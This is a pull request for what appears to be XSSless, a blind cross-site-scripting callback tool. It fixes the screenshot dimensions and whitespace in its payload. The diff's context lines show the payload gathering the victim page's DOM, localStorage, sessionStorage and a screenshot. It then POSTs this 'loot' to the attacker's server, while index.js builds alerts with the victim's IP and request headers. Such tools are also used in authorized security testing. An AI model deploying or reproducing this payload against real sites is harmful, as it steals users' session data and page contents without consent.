### PR TITLE
Set Image size to prevent upload errors

### DIFF
--- a/index.js
+++ b/index.js
@@ -54,10 +54,10 @@ function generate_callback_alert(headers, data, url) {
   var alert = "*XSSless: Out-of-Band Callback Alert*\n"
   alert += `• *IP Address:* \`${data["Remote IP"]}\`\n`
   alert += `• *Request URI:* \`${url}\`\n`
-  
+
   // Add all the headers
   for (var key in headers) {
-    if (headers.hasOwnProperty(key)) {       
+    if (headers.hasOwnProperty(key)) {
       alert += `• *${key}:* \`${headers[key]}\`\n`
     }
 }

--- a/payload.js
+++ b/payload.js
@@ -12,7 +12,7 @@ function return_value(value) {
 
 function screenshot() {
   return new Promise(function (resolve, reject) {
-    html2canvas(document.querySelector("html"), { letterRendering: 1, allowTaint: true, useCORS: true}).then(function (canvas) {
+    html2canvas(document.querySelector("html"), { letterRendering: 1, allowTaint: true, useCORS: true, width: 1024, height: 768}).then(function (canvas) {
         resolve(return_value(canvas.toDataURL())) // png in dataURL format
     });
   });
@@ -33,7 +33,7 @@ function collect_data() {
     collected_data["DOM"] = collected_data["DOM"].slice(0, 8192)
     try { collected_data["localStorage"] = return_value(localStorage.toSource()); } catch(e) {}
     try { collected_data["sessionStorage"] = return_value(sessionStorage.toSource()); } catch(e) {}
-    try { 
+    try {
       screenshot().then(function(img) {
         collected_data["Screenshot"] = img
         resolve(collected_data)
@@ -49,7 +49,7 @@ function exfiltrate_loot() {
   // Get the URI of our BXSS server
   var uri = new URL(curScript.src);
   var exf_url = uri.origin + "/c"
-  
+
   var xhr = new XMLHttpRequest()
   xhr.open("POST", exf_url, true)
   xhr.setRequestHeader("Content-Type", "application/json")


### PR DESCRIPTION
There was an issue in uploading extremely large pages. In one case, the uploaded image was 16MB.

 This PR sets the image size to a fixed height and width, and should make overall loading in real-world pages much faster.